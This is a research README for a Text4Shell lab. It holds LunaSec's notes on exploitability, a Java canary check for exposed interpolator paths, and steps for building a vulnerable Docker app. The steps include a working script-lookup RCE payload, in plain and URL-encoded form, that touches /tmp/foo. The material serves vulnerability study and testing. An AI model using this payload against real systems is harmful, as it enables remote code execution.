LunaSec Notes

LunaSec research notes from our investigation of Text4Shell, written as part of our blog post about the vulnerability.

We've determined that it's very unlikely that Text4Shell is exploitable in 99.999% of the usages of Apache Commons Text because very few people seem to be using the createInterpolator() method.

Our research focused on other ways that Apache Commons Text could invoke the script handler, but we were unable to find any other way to do so (even setting flags like setEnableSubstitutionInVariables to true or using recursive variable resolution).

You can see our notes in the HelloController.java file. The file in the Test folder is how we were testing this quickly. (We're using IntelliJ, so you can just run the test from there if you have that set up.)
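To make the distinction above concrete, here is an added check (not code from this repo or from HelloController.java) that runs the same harmless canary string through the three construction paths the notes compare: createInterpolator(), a plain map-backed StringSubstitutor with substitution-in-variables enabled, and an interpolator built from an explicit allow-list of lookups. It assumes commons-text is on the classpath; the canary value and class name are constructed for this example.

```java
import java.util.Map;
import java.util.function.Function;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

// Added example, not part of the LunaSec repo. Harmless canary: it only
// resolves to "canary" if the script lookup is actually dispatched.
public class InterpolatorExposureCheck {

    static final String CANARY = "${script:javascript:'ca'+'nary'}";

    // The path the notes identify as exposed: createInterpolator() wires in
    // every default lookup, which on Commons Text < 1.10.0 includes script/dns/url.
    static String viaCreateInterpolator(String input) {
        return StringSubstitutor.createInterpolator().replace(input);
    }

    // Map-backed substitutor: only keys present in the map resolve, even with
    // substitution-in-variables enabled (the flag the notes tested).
    static String viaMapSubstitutor(String input) {
        StringSubstitutor sub = new StringSubstitutor(Map.of("name", "world"));
        sub.setEnableSubstitutionInVariables(true);
        return sub.replace(input);
    }

    // Explicit allow-list: addDefaultLookups=false means script/dns/url are
    // never registered, whatever version of commons-text is on the classpath.
    static String viaAllowListedInterpolator(String input) {
        StringLookupFactory f = StringLookupFactory.INSTANCE;
        Map<String, StringLookup> allowed = Map.of(
                "date", f.dateStringLookup(),
                "env", f.environmentVariableStringLookup());
        StringLookup lookup = f.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(lookup).replace(input);
    }

    // true = the script prefix reached ScriptStringLookup. On JDKs without a
    // JavaScript engine that lookup throws IllegalArgumentException instead of
    // evaluating, which still proves the prefix is reachable.
    static boolean scriptLookupReachable(Function<String, String> path) {
        try {
            return "canary".equals(path.apply(CANARY));
        } catch (IllegalArgumentException noEngine) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("createInterpolator reachable: " + scriptLookupReachable(InterpolatorExposureCheck::viaCreateInterpolator));
        System.out.println("map substitutor reachable:    " + scriptLookupReachable(InterpolatorExposureCheck::viaMapSubstitutor));
        System.out.println("allow-listed reachable:       " + scriptLookupReachable(InterpolatorExposureCheck::viaAllowListedInterpolator));
    }
}
```

On a vulnerable commons-text version only the first line prints true; on 1.10.0 or later all three print false, since script/dns/url were dropped from the defaults.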

Original Readme

Install maven - maven-linux


  1. Maven install to create the fat jar
     mvn clean install
  2. Docker build
     docker build --tag=text4shell .
  3. Docker run
     docker run -p 80:8080 text4shell
  4. Test the app
     http://localhost/text4shell/attack?search=<anything>
  5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
     ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

     http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
  6. You can also try using dns or url prefixes.
  7. Get the container id
     docker container ls
  8. Get into the app
     docker exec -it <container_id> bash
  9. To check if the above RCE was successful (you should see a file named foo created in the /tmp directory):
     ls /tmp/
 10. To stop the container
     docker container stop <container_id>